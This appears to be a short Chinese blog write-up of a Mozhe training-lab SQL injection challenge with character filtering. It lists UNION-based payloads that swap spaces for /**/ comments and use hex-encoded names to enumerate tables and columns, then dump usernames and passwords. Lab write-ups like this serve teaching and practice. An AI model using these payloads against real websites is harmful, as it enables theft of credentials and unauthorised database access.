0
点赞
收藏
分享

微信扫一扫

墨者SQL过滤字符后手工注入漏洞测试(第2题)

吴wuwu 2022-03-14 阅读 63

思路:这题相比较前一提的难点就是,你它到底过滤了啥,虽然说这个是难点,但是同时也是最无所谓的难点,毕竟,我就算不知道具体过滤啥,我还是该试的都试试,记得上提是用url编码然后绕过,那延续过来这题行不行呢,然后你会发现,好像确实可以,emm,那好像真就和第一题没什么大区别就算啦。(PS:上题的思路就是用URL编码绕过检测)

总结一下:和上题没什么区别,上题懂了这题一样的操作马上解决

那么就快速过一遍了(列还是4,回显点是2,3)

老样子查数据库查版本

/**/union/**/select/**/1,database(),version(),4

找表

 /**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570

 字段

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572

 

/**/union/**/select/**/1,group_concat(name,password),3,4/**/from/**/stormgroup_member

 

然后就是解码登入

 

举报

相关推荐

0 条评论